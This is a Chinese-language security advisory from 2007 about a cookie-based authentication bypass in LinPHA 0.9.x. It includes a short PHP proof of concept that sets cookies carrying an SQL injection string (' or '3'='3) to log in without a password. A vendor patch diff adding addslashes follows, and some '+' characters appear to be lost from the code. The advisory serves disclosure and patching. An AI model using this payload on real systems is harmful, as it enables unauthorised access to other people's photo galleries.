Linpha远程验证绕过漏洞

来源：CP整理作者：不详发布时间：2007-03-10 阅读次数：

涉及程序：
LinPHA程序

描述：
Linpha远程验证绕过漏洞

具体：
LinPHA是一款基于WEB的图象照片库治理程序。
LinPHA在通过COOKIE进行验证时存在问题，远程攻击者可以利用这个漏洞未授权访问系统。
问题存在于session.php文件中，由于对linpha_userid和linpha_password COOKIE信息验证处理不正确，攻击者可以修改会话的COOKIE信息，不需要密码访问LinPHA系统。

受影响系统：
LinPHA LinPHA 0.9.4
LinPHA LinPHA 0.9.3
LinPHA LinPHA 0.9.2
LinPHA LinPHA 0.9.1
LinPHA LinPHA 0.9.0

攻击方法：
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?PHP
Fernando Quintero （nando@udea.edu.co）提供了如下测试方法：
setcookie("linpha_userid","1",time() 86400*365,'/linpha');
setcookie("linpha_password","' or
'3'='3",time() 86400*365,'/linpha');
?>

解决方案：
厂商补丁：

LinPHA
------
linpha的CVS版本已经修正此问题:
http://linpha.sourceforge.net/nuke/index.php
--- linpha/linpha/include/session.php 2004/07/06 07:20:34 1.12
linpha/linpha/include/session.php 2004/07/19 06:44:16 1.13
@@ -25,8 25,8 @@
isset($_COOKIE["linpha_password"])&&$_COOKIE["linpha_password"]!="")
{
$query_username = $GLOBALS['db']->Execute("SELECT nickname, level, groups FROM
".PREFIX."users ".
- "WHERE ID = '".$_COOKIE["linpha_userid"]."' AND ".
- "password = '".$_COOKIE["linpha_password"]."'");
"WHERE ID = '".addslashes($_COOKIE["linpha_userid"])."' ".
"AND password = '".addslashes($_COOKIE["linpha_password"])."'");
if($row = $query_username->FetchRow())
{
$_SESSION["REMOTE_ADDR"] = @$_SERVER["REMOTE_ADDR"];